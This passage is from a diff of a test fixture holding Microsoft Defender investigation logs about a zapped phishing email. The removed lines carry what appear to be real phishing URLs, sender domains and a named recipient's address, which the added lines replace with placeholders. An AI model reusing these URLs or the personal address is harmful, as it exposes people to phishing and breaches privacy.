AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:7350e5b982beaa3846d327a005dd57d6\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"EndTimeUtc\":\"2024-09-02T03:33:31\",\"InvestigationId\":\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"InvestigationType\":\"ZappedUrlInvestigation\",\"LastUpdateTimeUtc\":\"2024-09-02T03:28:24\",\"RunningTime\":771,\"StartTimeUtc\":\"2024-09-02T03:20:40\",\"Status\":\"Pending Action\"}" }, "expected": { - "message": 
"{\"CreationTime\":\"2024-09-02T03:33:37\",\"Id\":\"8217bd67-1368-4213-b6be-498cdbff1542\",\"Operation\":\"AirInvestigationData\",\"OrganizationId\":\"275ae857-f201-4a2e-8f43-d48391c56871\",\"RecordType\":64,\"UserKey\":\"AirInvestigation\",\"UserType\":4,\"Version\":1,\"Workload\":\"AirInvestigation\",\"ObjectId\":\"8217bd67-1368-4213-b6be-498cdbff1542\",\"UserId\":\"AirInvestigation\",\"Actions\":[\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:48971b6852ea31ff93989b88b832bca5\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"Recipient\\\":\\\"ggravier@ixina.com\\\",\\\"Urls\\\":[\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"https://zupimages.net/up/24/35/1itk.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P1Sender\\\":\\\"okhmqyjdcdn.bfwmwyytludfovodgfouzyeg@wdezd.ersdz.meradebo.com\\\",\\\"P1SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"SenderIP\\\":\\\"40.107.244.101\\\",\\\"P2Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P2SenderDisplayName\\\":\\\"Tractor Supply\\\",\\\"P2SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d 
\ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:98fed74e812bdb3dd6241259c9afe88d\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"}],\\\"RelatedAlertIds\\\":[\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's 
mailbox.\\\"}\",\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:780880f2766afe9e0a18e7c6fa676ee2\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"41e9cae8-deaa-4d89-6036-08dccaf8db1a\\\",\\\"2019a522-c814-4cd0-b23d-08dccaf8cc37\\\",\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"02c4a467-76c0-4491-737f-08dccaf8d47c\\\",\\\"26c865c1-2187-469c-5c0c-08dccaf8dca1\\\",\\\"c4ccc77c-0004-4c60-5f7d-08dccaf8d5b1\\\",\\\"5f3c47d0-051b-4439-8235-08dccaf8d27a\\\",\\\"1035a7d2-723e-4e0b-9b50-08dccaf8cf41\\\",\\\"1a8a159c-6655-45c4-8eef-08dccaf8d0e7\\\",\\\"1106f7ec-3c1f-45f6-2640-08dccaf90045\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://zpr.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://zpr.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 
AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:b2738e6d2385fbb888114d4d12dbb665\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"RelatedAlertIds\\\":[\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"],\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"EndTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"TimeGenerated\\\":\\\"2024-09-02T03:16:43.91Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"URLList\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"8a5bf71a-d9e4-422e-8bdb-33272de66983\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"InvestigationStatus\\\":\\\"Pending\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\"]
,\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fa76572799-59c1-0221-8c00-08dccafd4a30\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Recipient\\\":\\\"ggravier@ixina.com\\\",\\\"Urls\\\":[\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"https://zupimages.net/up/24/35/1itk.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P1Sender\\\":\\\"okhmqyjdcdn.bfwmwyytludfovodgfouzyeg@wdezd.ersdz.meradebo.com\\\",\\\"P1SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"SenderIP\\\":\\\"40.107.244.101\\\",\\\"P2Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P2SenderDisplayName\\\":\\\"Tractor Supply\\\",\\\"P2SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d 
\ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:98fed74e812bdb3dd6241259c9afe88d\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"4\\\",\\\"MailboxPrimaryAddress\\\":\\\"ggravier@ixina.com\\\",\\\"Upn\\\":\\\"ggravier@ixina.com\\\",\\\"AadId\\\":\\\"3339ab32-9c9a-4dab-a67b-d9316a37b2d3\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:9b5a6776b9acaade0704a7a3ed836036\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"5\\\",\\\"Url\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":12,\\\"Urn\\\":\\\"urn:UrlEntity:0436a04039e1a1bd9af706cbef1a6b7a\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"6\\\",\\\"NetworkMessageIds\\\":[\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( 
(Subject:\\\\\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\\\\\") ) AND ( (SenderIp:\\\\\\\"40.107.244.101\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b;40.107.244.101;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 
AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:88f2ce520265ef415e7f63e840feec95\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"7\\\",\\\"NetworkMessageIds\\\":[\\\"41e9cae8-deaa-4d89-6036-08dccaf8db1a\\\",\\\"2019a522-c814-4cd0-b23d-08dccaf8cc37\\\",\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"02c4a467-76c0-4491-737f-08dccaf8d47c\\\",\\\"26c865c1-2187-469c-5c0c-08dccaf8dca1\\\",\\\"c4ccc77c-0004-4c60-5f7d-08dccaf8d5b1\\\",\\\"5f3c47d0-051b-4439-8235-08dccaf8d27a\\\",\\\"1035a7d2-723e-4e0b-9b50-08dccaf8cf41\\\",\\\"1a8a159c-6655-45c4-8eef-08dccaf8d0e7\\\",\\\"1106f7ec-3c1f-45f6-2640-08dccaf90045\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://zpr.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://zpr.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 
AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:b2738e6d2385fbb888114d4d12dbb665\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"wdezd.ersdz.meradebo.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c 
\ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b;wdezd.ersdz.meradebo.com;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:7350e5b982beaa3846d327a005dd57d6\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"EndTimeUtc\":\"2024-09-02T03:33:31\",\"InvestigationId\":\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"InvestigationType\":\"ZappedUrlInvestigation\",\"LastUpdateTimeUtc\":\"2024-09-02T03:28:24\",\"RunningTime\":771,\"StartTimeUtc\":\"2024-09-02T03:20:40\",\"Status\":\"Pending Action\"}", + "message": 
"{\"CreationTime\":\"2024-09-02T03:33:37\",\"Id\":\"1234ab56-7890-1234-c5de-678fabcd9012\",\"Operation\":\"AirInvestigationData\",\"OrganizationId\":\"123abc456-d789-0e1f-2a34-b56789c01234\",\"RecordType\":64,\"UserKey\":\"AirInvestigation\",\"UserType\":4,\"Version\":1,\"Workload\":\"AirInvestigation\",\"ObjectId\":\"1234ab56-7890-1234-c5de-678fabcd9012\",\"UserId\":\"AirInvestigation\",\"Actions\":[\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:12345a6789bc01de23456f789ab0\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"Recipient\\\":\\\"user@mailbox.com\\\",\\\"Urls\\\":[\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"https://website.net/up/24/35/image.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"sender@test.integration.com\\\",\\\"P1Sender\\\":\\\"p1sender@test.integration.com\\\",\\\"P1SenderDomain\\\":\\\"test.integration.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"sender@test.integration.com\\\",\\\"P2SenderDisplayName\\\":\\\"P2 name\\\",\\\"P2SenderDomain\\\":\\\"test.integration.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"Subject of the mail\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message 
moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:01abc23d456efa7bc8901234d5efa67b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"}],\\\"RelatedAlertIds\\\":[\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - 